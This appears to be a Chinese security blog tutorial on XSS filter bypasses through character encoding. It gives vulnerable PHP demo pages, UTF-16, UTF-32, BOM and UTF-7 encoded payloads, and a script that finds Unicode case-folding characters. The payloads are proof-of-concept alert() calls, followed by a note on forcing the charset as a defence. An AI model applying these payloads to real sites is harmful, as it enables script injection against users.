XSS与字符编码(UTF-7, UTF-8, UTF-16, UTF-32)

  1. 0x01 什么是Unicode
  2. 0x02 控制字符集
  3. 0x03 利用大小写转换
  4. 0x04 BOM(Byte Order Mark)
  5. 0x05 最后来谈一下UTF-7
  6. 0x06 参考资料

author: Dlive

0x01 什么是Unicode

Unicode is nothing but the encoding standard. It defines UTF-8, UTF-16,UTF-32, etc encodings.

  1. UTF-8 :
    Characters Size : 1 byte to 4 byte

    Example :
    Character “A” => 0x41
    Character “¡” => 0xC2 0xA1
    Character “ಓ” => 0xE0 0xB2 0x93
    Character “𪨶” => 0xF0 0xAA 0xA8 0xB6

  2. UTF-16 :
    Character Size : 2 byte

    However in UTF-16 there are two ways to represent any characters.

    • UTF-16be (be- Big Endian) [Left to Right Byte Order ]
      Example :Character “A” => 0x00 0x41

    • UTF-16le (le- Little Endian) [Right to Left Byte Order]
      Example : Character “A” => 0x41 0x00

  3. UTF-32 :

    Character Size : 4 byte

    In UTF-32 also there are two ways to represent any character.

    • UTF-32be (be- Big Endian) [Left to Right Byte Order]

      Example :Character “A” => 0x00 0x00 0x00 0x41

    • UTF-32le (le- Little Endian) [Right to Left Byte Order]

      Example :Character “A” => 0x41 0x00 0x00 0x00

0x02 控制字符集

Demo代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php

header('X-XSS-Protection: 0');

header('Content-Type: text/html; charset='.$_GET['charset']);

highlight_string(file_get_contents(__FILE__, true));

$x=$_GET['x'];

$x=preg_replace('/<\w+/', '', $x);

echo $x;

?>

可以看到攻击者可控制HTML页面编码

那么可以使用UTF-16和UTF-32来绕过过滤,我们使用的payload为<svg/onload=alert()>

构造payload

payload1:(UTF-16le)

1
http://rakeshmane.com/lab/unicode/xss.php?x=%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E%00&charset=utf-16le

payload2:(UTF-16be)

1
http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E&charset=utf-16be

payload3:(UTF-32le)

1
http://rakeshmane.com/lab/unicode/xss.php?x=%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00%3D%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00%28%00%00%00%29%00%00%00%3E%00%00%00&charset=utf-32le

payload4:(UTF-32be)

1
http://rakeshmane.com/lab/unicode/xss.php?x=%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00%3D%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00%28%00%00%00%29%00%00%00%3E&charset=utf-32be

注意

When you don’t specify BE (Big Endian) or LE (Little Endian) then browsers by default consider encoding as “Big Endian” in UTF-32 and “Little Endian” in UTF-16 encoding.

当你不指定Big Endian或Little Endian时,浏览器会将UTF-16识别为Little Endian,将UTF-32识别为Big Endian。

0x03 利用大小写转换

我们可以通过下面这个脚本寻找一些特殊的Unicode字符,这些字符有这样的特点:

这些字符转换为大写字符或转换为小写字符后,转化的结果为一个英文字母(ASCII)

我们可以用这些字符绕过一些过滤器

1
2
3
4
5
6
7
8
9
10
11
highNumber=65000;
for(i=0;i<highNumber;i++){
x=""
y=""
if("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"/?><';:.,|\\+=-_*&^%$#@!~`".includes(String.fromCharCode(i).toLowerCase()))
x=String.fromCharCode(i).toLowerCase()
if("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"/?><';:.,|\\+=-_*&^%$#@!~`".includes(String.fromCharCode(i).toUpperCase()))
y=String.fromCharCode(i).toUpperCase()
if((x!=""||y!="")&&!("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"/?><';:.,|\\+=-_*&^%$#@!~`".includes(String.fromCharCode(i))))
console.log(" "+i+" Original : "+String.fromCharCode(i)+" [\\u"+(i).toString(16)+"] LowerCase : "+x+" UpperCase : "+y)
}

Demo代码如下

1
2
3
4
5
6
7
8
9
10
<?php
header('Content-Type: text/html; charset=UTF-8');
header('X-XSS-Protection: 0');

highlight_string(file_get_contents(__FILE__, true));
$x=$_GET['x'];
$x=str_ireplace('<script','BLOCKED',$x);
$x = mb_convert_case($x, MB_CASE_UPPER);
echo $x;
?>

mb_convert_case 函数的作用为进行大小写转换,第二个参数决定了是转换为大写还是转换为小写

payload:

我们使用上图中的字符替换S字母

1
http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>

用大小写转换绕过XSS过滤器的例子:(Google CTF 2017 geokitties v2)
https://github.com/glua-team-ctf/googlectf-quals-2017/blob/master/web/geokitties-v2/README.md

0x04 BOM(Byte Order Mark)

什么是BOM?(Wikipedia)

For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

简而言之,系统可以根据文本开头的固定字节来识别文本的编码,这部分固定字节就是BOM

Note : The page must begin with the BOM character.

BOM Character :

For UTF-16 Encoding:

Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE

For UTF-32 Encoding:

Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00

Let me tell you one interesting thing about BOM character, it allows you to override charset of the page. The only requirement is that page should begin with this character.

Demo:(PHP强制指定了编码,使用BOM进行Override)

1
2
3
<?php header('X-XSS-Protection: 0');header('Content-Type: text/html;charset=utf-8'); echo preg_replace('/<\w+/', '', $_GET['q']) ?>

<?php highlight_string(file_get_contents(__FILE__, true));?>

Payload:(utf-16le BOM)
使用的payload还是<svg/onload=alert()>,utf-16le编码后加上utf-16le BOM

1
http://rakeshmane.com/lab/unicode/xss5.php?q=%FF%FE%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00%3D%00a%00l%00e%00r%00t%00%28%00%29%00%3E%00

其他编码同理

0x05 最后来谈一下UTF-7

在IE低版本中,可以通过设置UTF-7 BOM来让IE以UTF-7解析页面,进而导致XSS过滤器被绕过引起XSS

现在的浏览器基本已经不支持UTF-7编码了,所以这个方法实用价值不大

UTF-7 BOM: +/v8

常见payload:

1
%2B%2Fv8%20%2BADw-SCRIPT%2BAD4-alert('XSS')%3B%2BADw-%2FSCRIPT%2BAD4-

防御措施为强制指定编码,在Content-Type中设置charset=utf-8

0x06 参考资料

  1. Xssing Web With Unicodes

http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html

  1. UTF-7 XSS Paper

http://obnus.blog.51cto.com/2001354/494659

  1. JSONP安全攻防技术

http://blog.knownsec.com/2015/03/jsonp_security_technic/